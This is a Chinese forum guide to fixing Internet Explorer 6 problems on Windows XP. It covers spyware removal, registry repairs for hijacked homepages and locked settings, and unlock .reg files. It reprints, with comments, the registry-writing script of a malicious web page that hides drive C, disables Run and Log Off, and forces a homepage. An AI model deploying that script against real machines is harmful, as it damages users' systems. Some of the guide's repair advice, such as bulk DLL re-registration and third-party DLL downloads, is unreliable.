希望这篇文章能够对IE用户有所帮助,其内容都是根据本人的使用经验和在新闻组中遇到的用户所反馈的问题分析整理而成(部分内容整理自微软Windows创新日课件),所以难免有疏漏之处,欢迎各位加以补充。
一 般来说Internet Explorer浏览器自身出现故障的情况比较少,大多数故障都是因为系统中存在的流氓软件和第三方控件(ActiveX)、浏览器帮助程序对象 (BHO)所造成的。恶意广告软件(Adware)、间谍软件(Spyware)、恶意共享软件(Malicious shareware)都属于流氓软件的范畴。此类程序通常都有一个共同的特点,那就是在用户毫不知情的情况下被安装到系统中,不易被察觉且不能被 轻易找到和卸载,甚至根本就没有提供卸载程序,它们不但会使IE或系统出现各种莫名奇妙的故障,更令人深恶痛绝的是还会偷偷记录用户的操作记录和使用习惯 并将其发送到相关厂商或个人(也就是指我们常说的行为记录),从而造成用户隐私被泄漏。所以,建议大家使用工具将它们从系统中“请出去”,推荐使用以下几 款反间谍软件查杀(建议断网后在安全模式中扫描系统):
1、HiJackThis
下载地址:http://www.hijackthis.de/en
2、Windows Defender Beta 2(原Microsoft Windows AntiSpyware)
下载地址:
http://www.microsoft.com/athome/secu...e/default.mspx
3、CWShredder
下载地址:http://www.trendmicro.com/cwshredder/
4、Ad-Aware
下载地址:http://www.lavasoft.de/ms/index.htm
5、eTrust PestPatrol Anti-Spyware
下载地址:http://www.ca.com/products/pestpatrol
6、Spybot Search and Destroy
下载地址:http://www.safer-networking.org/microsoft.en.html
相关信息您可以参考以下KB:
微软官方网站中关于间谍软件信息的页面
http://www.microsoft.com/china/athom...e/default.mspx
怎样对付间谍软件和其他有害的软件
http://www.microsoft.com/china/athom...ywarewhat.mspx
帮助识别欺骗性(冒牌)网站和恶意超链接及进行自我防护的步骤
http://support.microsoft.com/default.aspx?scid=kb;[ln];833786&spid=807&sid=global
访问某些Web站点时显示新窗口
http://support.microsoft.com/default...807&sid=global
欺骗性软件可能会使计算机出现莫名其妙的问题
http://support.microsoft.com/default...b;zh-cn;827315
主页设置被意外更改或者无法更改主页设置
http://support.microsoft.com/default...807&sid=global
安装SP2后及更新了最新补丁以后Internet Explorer常见的一些问题
当您的系统安装了XP SP2补丁包后,Internet Explorer也随之更新为SP2,并且其安全性有所提升,IE6 SP2在安全方面主要有以下特性:
1、锁定本机域(Local Machine Zone)
2、更加严格的Binary Behavior控制
3、默认不允许区域提升
4、默认会阻止没有经过签名的ActiveX Controls
5、严格的MIME信息检查
6、默认会阻止弹出窗口
案例一:Windows XP SP2系统中IE不能正确显示网页内容
故障现象:当用户点击一些文件的链接时,比如一个视频文件(WMV)或者一个图片文件(JPG),IE并没有提示下载框,有的时候甚至将这些文件显示成纯文本的状态,从用户的角度去看,就是显示成乱码。
故障原因:WEB管理员设置了错误的Content-Type,IE在SP2中进行了更加严格的MIME检查,如果IE发现Server所指定的Content-Type与扩展名以及MIME Sniff的结果不符合时,那么IE就会拒绝下载文件。
解决方案:需要修改服务器页面上的Content-Type或者通过修改客户端注册表来弱化IE的MIME检查(不推荐)。
案例二:安装最新补丁以后所有包含ActiveX的网页工作不正常
1、故障现象:安装MS05-052补丁后,很多包含ActiveX的网页工作不正常。
故障原因:因为MS05-052补丁加强了IE的安全性,它引入了更多的安全检查,其中一项就是在COM对象可以在IE中运行之前,IE会检查ObjectSafey接口中是否存在位于Internet区域的ActiveX控件,这个新功能很大程度上保护了客户端的安全。
解决方案:要想从根本上解决该问题,您需要对ActiveX重新编译,并将控件标识为安全。相关方法您可以参考以下两篇KB:
http://support.microsoft.com/kb/216434
http://support.microsoft.com/kb/161873
临时解决方案:可以通过添加注册表方式将ActiveX控件标记为可安全执行脚本和可安全初始化,相关信息您可以参考以下KB:http://support.microsoft.com/kb/909738
2、故障现象:安装了MS05-051以后,出现下列症状:
-Windows安装程序、Windows防火墙、COM+服务可能不会启动
-网络连接文件夹为空
-Windows更新网站可能会错误的建议您更改IE中的“持续使用用户数据”设置
-在IIS上运行的ActiveX Server Pages(ASP)页返回“HTTP 500”信息
-Microsoft组件服务Microsoft管理控制台(MMC)树中的“计算机”节点无法展开
-经过身份验证的用户无法登陆,而且在用户应用十月份的安全更新后出现空白屏幕
故障原因:如果有任何COM/COM+应用程序无法访问COM+编录文件(%Windir%\registration\*.CLB)就可能会出现此问 题,应用程序不能访问COM+编录文件是因为这些文件上的权限巳被更改,不再是原来的默认设置,在安装MS05-051补丁之前,不要求提供对COM+编 录的显示权限,但安装后会检查权限。
解决方案:请确保Admin、System对%Windir%\registration\有完全控制权限,并确保Everyone对%Windir%\registration\有读权限。
Internet Explorer的常规排错步骤
步骤一:如果是IE本身出现错误,其原因多数都是因为某些属于IE的DLL、OCX组件注册不正确或是在注册表中的注册信息产生混乱、损坏、丢失造成的,您可以按如下几种方法重新注册IE的组件:
方法一:在“开始/运行”中输入:"%Program Files%\Internet Explorer\iexplore.exe" /rereg(包含引号) 后点击确定即可。
方法二:打开记事本输入以下内容:
For %% i in (c:\windows\system32\*.dll) Do regsvr32.exe /s %%i
For %% i in (c:\windows\system32\*.ocx) Do regsvr32.exe /s %%i
然后将其保存为reg.bat批处理文件,运行它就可以修复一些因动态链接库失效所造成的问题。
方法三:请逐个重新注册以下列出的与IE有关的重要DLL(动态链接库)文件:
scrrun.dll msxml.dll mshtml.dll jscript.dll Urlmon.dll shdocvw.dll
browseui.dll softpub.dll wintrust.dll dssenh.dll rsaenh.dll gpkcsp.dll
sccbase.dll slbcsp.dll cryptdlg.dll actxprxy.dll shell32.dll oleaut32.dll
注册方法:在“开始/运行”中键入“regsvr32 DLL文件”(注意:regsvr32命令与DLL文件之间有空格且注册时不包括引号)
如果注册时发现某个文件找不到,那么您可以从http://www.dll-files.com搜索下载...��件即可。
相关信息您可以参考以下内容:
单击链接后无法打开新的 Internet Explorer 窗口或没有任何反应
http://support.microsoft.com/?kbid=281679
步骤二:清除所有的IE缓存文件、COOKIE、历史记录、自动完成表单和密码、SSL状态
1)进入IE中的“Internet选项”“常规”页面并清除历史记录、删除COOKIE、删除文件—删除所有脱机内容。
2)进入IE中的“Internet选项”“隐私”页面检查级别是否被设置过高,如果是请降低级别为中或更低。
3)进入IE中的“Internet选项”“内容”选项点击“清空SSL状态”并进入“自动完成”选项,点击“清除表单”“清除密码”确定后退出。
您也可以到以下地址下载一款名为“ClearIECache”的工具来删除所有的IE缓存文件、COOKIE、历史记录:
http://www.microsoft.com/downloads/d...displaylang=en
步骤三:请将Internet Explorer中的所有设置重新设为默认设置。
步骤四:禁用或删除第三方控件
如果您的系统为XP SP2,那么可以通过IE中的“管理加载项”功能禁用它们,如果为其它系统则可以通过取消选中Internet选项“高级”页“浏览”栏下的“启用第三方 浏览器扩展(需重启)”前的复选框来禁用第三方控件或者进入“Internet选项”“常规”页面,单击“Internet临时文件”中的“设置”,再单 击“查看对象”来打开“Downloaded Program Files”文件夹,在其中的控件文件上点鼠标反键并选择“删除”来将第三方控件删除掉。当然,您也可以使用工具来完成禁用和删除第三方控件的操作,例 如:upiea(不限于这一种)下载地址:http://www.lumix.cn/upiea/
相关信息您可以参考以下KB:
如何禁用第三方工具带区和浏览器帮助对象
http://support.microsoft.com/kb/298931/zh-cn
如何在Windows中删除ActiveX控件
http://support.microsoft.com/kb/154850/zh-cn
如何在Windows XP Service Pack 2中管理Internet Explorer附件http://support.microsoft.com/?scid=kb;zh-cn;883256
了解和排除Internet Explorer中不可恢复的错误(故障)
http://support.microsoft.com/?scid=k...id=807&sid=186
如何重新安装或修复Windows XP中的Internet Explorer和Outlook Express
http://support.microsoft.com/default...b;zh-cn;318378
http://bbs.mscommunity.com/forums/Sh...px?PostID=5852
关于IE脚本错误的问题
一般来说,IE出现脚本错误的原因大概有以下几种:
-网页的HTML源代码中有问题。
-您的计算机或网络上阻止了活动脚本、ActiveX 控件或Java小程序。Internet Explorer或另外一种程序(如防病毒程序或防火墙)可以配置为阻止活动脚本、ActiveX 控件或Java小程序。
-防病毒软件配置为扫描您的“临时Internet文件”或“已下载的程序文件”文件夹。
-您计算机上的脚本引擎损坏或过时。
-您计算机上的Internet相关文件夹损坏。
-您的视频卡驱动程序已损坏或者已过时。
-您计算机上的DirectX组件损坏或过时。
关于如何排除Internet Explorer中的脚本错误,您可以参考这篇KB:
http://support.microsoft.com/kb/308260/zh-cn
您也可以尝试安装最新版本的JAVA程序来解决脚本错误
下载地址:http://www.java.com/zh_CN/
微软WINDOWS SCRIPCHS 5.6
下载地址:http://download.microsoft.com/downlo...e/scripchs.exe
推荐几款除错工具
如果您具备一定的动手能力和系统知识,那么也可以尝试一下以下几种常用的Windows/Internet Explorer除错工具:
1、[Process Explorer]
下载地址:http://www.sysinternals.com/Utilitie...sExplorer.html
2、[Registry Monitor]
下载地址:http://www.sysinternals.com/utilities/regmon.html
3、[File Monitor]
下载地址:http://www.sysinternals.com/Utilities/Filemon.html
4、[TDIMon]
下载地址:http://www.sysinternals.com/utilities/tdimon.html
5、[Advanced Registry Tracer]
下载地址:http://www.elcomsoft.com/art.html
6、Microsoft Product Support's Reporting Tools(Microsoft配置捕获实用工具)
下载地址:http://www.microsoft.com/downloads/d...displaylang=en
相关信息:
Microsoft配置捕获实用工具(MPS_REPORTS)概述:
http://support.microsoft.com/kb/818742
最后,想提醒各位IE用户,当您在使用IE的过程中遇到问题时,可以先使用关键字在微软的官方知识库(KB)中查找解决方案
如何使用关键字和查询词查询Microsoft知识库:
http://support.microsoft.com/?scid=kb;zh-cn;242450
Microsoft Internet Explorer产品支持中心页面:
http://support.microsoft.com/ph/807
--------------------------------------------------------------------------------
如有疑问和问题待解决,请跟帖提出,我们会尽力回答。帖子主题与提问无关者直接删除。
例:
Q:我的IE6在登录网站时总是显示上次所访问的内容,不能自动更新,需要手动刷新才行。用“系统还原”或“重装IE”均无效。以前也出现过多次此种情况,最后只能重装系统。请问大侠还有无更好办法?
A:请您先清空IE的所有缓存文件,包括cookie、历史记录和所有脱机内容,然后再重新登陆该网站,或者请进入“Internet选项—常规”页面, 单击“Internet临时文件”栏中的“设置”按钮,在“检查所存网页的较新版本”栏中请选中“自动”或“每次访问此页时检查”复选框即可。
IE自动关闭所有窗口
<!-- / icon and title --><!-- message -->
因所有IE窗口都使用同一个“IEXPLORE.EXE”进程,所以该情况可能是某窗口非法操作造成的。
打开注册表进入[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Explorer]键值,新建“BrowseNewProcess”子键,其值设为“Yes”,分离每个浏览窗口进程,重启生效。
如果是由于IE出现错误被关闭的,说明IE核心中某些动态链接库中DLL文件在注册表中的相关内容(/注册信息)丢失或出错引起的。一般是因为安装了某些软件导致的错误。
“运行”---“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”(注册DLL文件)
“ mshtml.dll、 urlmon.dll、 msjava.dll 、browseui.dll、 oleaut32.dll 、shell32.dll”(修复安装或升级IE)
防范故障的发生
1)经常清理“系统盘:\Documents and Settings\用户名\Local Settings\Temporary Internet Files”文件夹里面的内容,特别是Cookies;
2)备份IE注册表键值,直接删除原主键后导入,可有效解决无法打开链接或二层链接故障;
3)系统文件核心受损时重装最直接。
<!-- / message --><!-- controls -->
浏览网页注册表被修改之迷及解决办法
<!-- / icon and title --><!-- message -->
一、注册表被修改的原因及解决办法
其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果。
1、IE默认连接首页被修改
IE浏览器上方的标题栏被改成“欢迎访问******网站”的样式,这是最常见的篡改手段,受害者众多。
受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“*****”就会将你的IE默认连接首页修改为http: //ppw.****.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。
解决办法:
A.注册表法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
②展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about :blank”即可;
③同理,展开注册表到HKEY_CURRENT_USER\Software\MicrosoftInternet Explorer\Main
在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,一切OK了!
B.特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址啦,十分的难缠。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。
解决办法:
运行注册表编辑器regedit.exe,然后依次展开HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Current Version\Run主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\ProgramFiles\ registry.exe,最后从IE选项中重新设置起始页就好了。
2、篡改IE的默认页
有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改: HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。
解决办法:
A.运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了,或者设置为IE的默认值。
B.msconfig 有的还是将程序写入硬盘中,重启计算机后 首页设置又被改了回去,这时可使用“系统配置实用程序”来解决。开始-运行,键入msconfig点击“确定”,在弹出的窗口中切换到“启动”选项卡,禁用可疑程序启动项。
3、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改回来。主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] "Settings"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel] "Links"=dword:1
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]"SecAddSites"=dword:1
解决办法:
将上面这些DWORD值改为“0”即可恢复功能。
4、IE的默认首页灰色按扭不可选
这是由于注册表HKEY_USERS\DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改为“1”(即为灰色不可选状态)。
解决办法:
将“homepage”的键值改为“0”即可。
5、IE标题栏被修改
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。
具体说来受到更改的注册表项目为:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
解决办法:
①在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
②展开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title”,将该串值删除即可,或将Window Title的键值改为“IE浏览器”等你喜欢的名字;
③同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main然后按②中所述方法处理。
④退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题解决了!
6、IE右键菜单被修改
受到修改的注册表项目为:HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt下被新建了网页的广告信息,并由此在IE右键菜单中出现!
解决办法:
打开注册标编辑器,找到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt删除相关的广告条文即可,注意不要把下载软件FlashGet和Netants也删除掉啊,这两个可是“正常”的呀,除 非你不想在IE的右键菜单中见到它们。
7、IE默认搜索引擎被修改
在IE浏览器的工具栏中有一个搜索引擎的工具按钮,可以实现网络搜索,被篡改后只要点击那个搜索工具按钮就会链接到那个篡改网站。
出现这种现象的原因是以下注册表被修改:
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant
解决办法:
运行注册表编辑器,依次展开上述子键,将“CustomizeSearch”和“SearchAssis tant”的键值改为某个搜索引擎的网址即可。
8、系统启动时弹出对话框
受到更改的注册表项目为: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon在其下 被建立了字符串“LegalNoticeCaption”和“LegalNoticeText”,其中“LegalNoticeCaption”是提示框 的标题,“LegalNoticeText”是提示框的文本内容。由于它们的存在,就使得我们每次登陆到Windwos桌面前都出现一个提示窗口,显示那 些网页的广告信息!你瞧,多讨厌啊!
解决办法:
打开注册表编辑器,找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Winlogo这一个主键,然后在右边窗口中找到“LegalNoticeCaption”和 “LegalNoticeText”这两个字符串,删除这两个字符串就可以解决在登陆时出现提示框的现象了。
9、浏览网页注册表被禁用
这是由于注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故,将其键值恢复为“0”即可恢复注册 表的使用。
解决办法:
用记事本程序建立以REG为后缀名的文件,将下面这些内容复制在其中就可以了:
REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]“DisableRegistryTools”=dword:00000000。
10、浏览网页开始菜单被修改
这是最“狠”的一种,让浏览者有生不如死的感觉。浏览后不仅有类似上面所说的那些症状,还会有以下更悲惨的遭遇:
进入该网页会被:
1.修改开始菜单
1)禁止“关闭系统”
2)禁止“运行”
3)禁止“注销”
2.隐藏C盘——你的C盘找不到了
3.禁止使用注册表编辑器regedit
4.禁止使用DOS程序
5.使系统无法进入“实模式”
6.禁止运行任何程序
7.将IE浏览器的首页改为http://www.findfeel.com/,收藏夹中也被加入该网址。
那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。
注:下面代码是将你的IE默认连接首页改为http://www.findfeel.com/
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.findfeel.com/");
注:以下是该网页修改受害者的注册表项所用的招数
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY");
注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY");
注:使受害者系统没有“注销”项
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
注:使受害者系统没有逻辑驱动器C
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\ Disabled","REG_BINARY");
注:禁止运行所有的DOS应用程序;
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\ \WinOldApp\\NoRealMode","REG_BINARY");
注:使系统不能启动到“实模式”(传统的DOS模式)下;
又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "呜啦啦...");
注:这些代码会使窗口的标题是“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");
注:上面一行是会在窗口中显示出来的文字
注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦...");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "呜啦啦...");
注:到上面一行为止,完成了对受害者的注册表的所有修改!
注:下面代码用来将其网页增加到受害者的收藏夹中
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\
" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
注:下面就是使其网页加入到你的收藏夹的具体代码
AddFavLnk(loc, "找到感觉www.findfeel.com", "http://www.findfeel.com");
由于代码很简单,又加了注释,相信你已经看明白是怎么回事了。那么如果不小心进入该网页,并且已经中招了该怎么办呢?别急,下面给你列出了解决的办法。
受害用户的修复方法:
1:对于Win9x用户,建议在电脑启动时按F8键,选择到MS-DOS方式下,使用Scanreg/restore命令来恢复以前备份的、正常的注册表。
2:对于Win2000用户,把以下内容copy下来,存为unlock.reg文件,选带命令行的安全模式,用命令regedit unlock.reg导入,如何,重启机器就OK了。
unlock.reg文件内容如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]"DisableRegistryTools"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]"Disabled"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]"NoRealMode"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]"LegalNoticeCaption"="""LegalNoticeText"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE浏览器"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Window Title"="IE浏览器"
以上是比较常见的修改浏览者注册表的现象,今天在浏览网页时,无意中来到某个个人网站,又遇到了以前没有碰到过的问题:
11、IE中鼠标右键失效
浏览网页后在IE中鼠标右键失效,点击右键没有任何反应!
12、查看““源文件”菜单被禁用
在IE窗口中点击“查看”→“源文件”,发现“源文件”菜单已经被禁用。
我在浏览网页时并没有注意到上面这两个问题,因为当时正好朋友叫我有事,于是我就退出电脑了,晚上吃完饭开启电脑连线上网,就发现IE中鼠标右键失效,“查看”菜单中的“源文件”被禁用。不能查看源文件也就罢了,但是无法使用鼠标右键真是太不方便了。得想个办法!
找出最新版的超级兔子魔法设置试试吧,呀!不能解决!看来是个新问题,不过自己好歹也是“老革命”了,这点问题应该难不住我。于是到注册表中一番搜寻,经过一番查找终于弄明白了问题的所在。
原来,恶意网页修改了我的注册表,具体的位置为:在注册表HKEY_CURRENT_USER\Software\Policies\ Microsoft\Internet Explore下建立子键“Restrictions”,然后在“Restrictions”下面建立两个DWORD值:“NoViewSource”和 “NoBrowserContextMenu”,并为这两个DWORD值赋值为“1”。
在注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions下,将两个DWORD值:“NoViewSource”和“NoBrowserContextMenu”的键 值都改为了“1”。
通过上面这些键值的修改就达到了在IE中使鼠标右键失效,使“查看”菜单中的“源文件”被禁用的目的。要向你说明的是第2点中提到的注册表其实相当于第1点中提到的注册表的分支,修改第1点中所说的注册表键值,第2点中注册表键值随之改变。
解决办法:
明白了道理,问题解决起来就容易多了,具体解决办法为:将以下内容另存为后缀名为reg的注册表文件,比方说unlock.reg,双击unlock.reg导入注册表,不用重启电脑,重新运行IE就会发现IE的功能恢复正常了。
REGEDIT4
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
\Restrictions]
“NoViewSource”=dword:00000000
"NoBrowserContextMenu"=dword:00000000
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer
\Restrictions]
“NoViewSource”=dword:00000000
“NoBrowserContextMenu”=dword:00000000
要特别注意的是,在你编制的注册表文件unlock.reg中,“REGEDIT4”一定要大写,并且它的后面一定要空一行,还有, “REGEDIT4”中的“4”和“T”之间一定不能有空格,否则将前功尽弃!许多朋友写注册表文件之所以不成功,就是因为没有注意到上面所说的内容,这 回该注意点喽。请注意如果你是Win2000或WinXP用户,请将“REGEDIT4”改为Windows Registry Editor Version 5.00。
二、预防办法
1、要避免中招,关键是不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。
2、由于该类网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。
具体方法是:在IE窗口中点击“工具→Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对 话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些正常使用 ActiveX的网站无法浏览。唉,有利就有弊,你还是自己看着办吧。
3、对于Windows98用户,请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的 “ActiveXComponent.class”删掉;对于WindowsMe用户,请打开C:\WINDOWS\JAVA\Packages \5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉。请放心,删除这个组件不会影响到你正常浏览网页的。
4、下载超级兔子魔法设置软件后安装,如果出现问题,可以用它来恢复。不过 “兔子”对于我们在上面所说的恶意网页使得IE中鼠标右键失效,“查看”菜单中的 “源文件”被禁用这两种现象无法恢复。
5、既然这类网页是通过修改注册表来破坏我们的系统,那么我们可以事先把注册表加锁:禁止修改注册表,这样就可以达到预防的目的。不过,自己要使用注册表编辑器regedit.exe该怎么办呢?因此我们还要在此前事先准备一把“钥匙”,以便打开这把“锁”!
加锁方法如下:
(1)运行注册表编辑器regedit.exe;
(2)展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ Policies\System下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑 器regedit.exe。
解锁方法如下:
用记事本编辑一个任意名字的.reg文件,比如unlock.reg,内容如下: REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies \System]“DisableRegistryTools”=dword:00000000存盘,你就有了一把解锁的钥匙了!如果要使用注册表编辑 器,则双击unlock.reg即可。请注意如果你是Win2000或WinXP用户,请将“REGEDIT4”写为Windows RegistryEditor Version 5.00。
6、对Win2000用户,还可以通过在Win2000下把服务里面的远程注册表操作服务“Remote Registry Service”禁用,来对付该类网页。具体方法是:点击“管理工具→服务→Remote Registry Service(允许远程注册表操作)”,将这一项禁用即可。
7、如果觉得手动修改注册表太危险,可以下载如下reg文件,双击之可恢复被修改的注册表。
8、虽然经过一番辛苦的劳动修改回了标题和默认连接首页,但如果以后又不小心进入该站就又得麻烦一次。其实,你可以在IE中做一些设置以便永远不进该 站点:打开IE,点击“工具”→“Internet选项”→“内容”→“分级审查”,点“启用”按钮,会调出“分级审查”对话框,然后点击“许可站点”标 签,输入不想去的网站网址,如输入:http://***.****.com,按“从不”按钮,再点击“确定”即大功告成
IE浏览器防黑技巧
<!-- / icon and title --><!-- message -->
1.管理好Cookie
在IE6.0中,打开“工具”→“Internet选项”→“隐私”对话框,这里设定了“阻止所有Cookie”、“高”、“中高”、“中”、 “低”、“接受所有Cookie”六个级别(默认为“中”),你只要拖动滑块就可以方便地进行设定,而点击下方的“编辑”按钮,在“网站地址”中输入特定 的网址,就可以将其设定为允许或拒绝它们使用Cookie。
2.禁用或限制使用Java程序及ActiveX控件
在网页中经常使用Java、Java Applet、ActiveX编写的脚本,它们可能会获取你的用户标识、IP地址,乃至口令,甚至会在你的机器上安装某些程序或进行其他操作,因此应对 Java、Java小程序脚本、ActiveX控件和插件的使用进行限制。打开“Internet选项”→“安全”→“自定义级别”,就可以设置 “ActiveX控件和插件”、“Java”、“脚本”、“下载”、“用户验证”以及其它安全选项。对于一些不太安全的控件或插件以及下载操作,应该予以 禁止、限制,至少要进行提示。
3.防止泄露自己的信息
缺省条件下,用户在第一次使用Web地址、表单、表单的用户名和密码后,同意保存密码,在下一次再进入同样的Web页及输入密码时,只需输入开头部 分,后面的就会自动完成,给用户带来了方便,但同时也留下了安全隐患,不过我们可以通过调整“自动完成”功能的设置来解决。设置方法如下:依次点击 “Internet选项”→“内容”→“自动完成”,打开“自动完成设置”对话框,选中要使用的“自动完成”复选项。
提醒:为发安全起见,防止泄露自己的一些信息,应该定期清除历史记录,方法是在“自动完成设置”对话框中点击“清除表单”和“清除密码”按钮。
4.清除已浏览过的网址
在“Internet选项”对话框中的“常规”标签下单击历史记录区域的“清除历史记录”按钮即可。若只想清除部分记录,单击IE工具栏上的“历史”按钮,在左栏的地址历史记录中,找到希望清除的地址或其下网页,单击鼠标右键,从弹出的快捷菜单中选取“删除”。
5.清除已访问过的网页
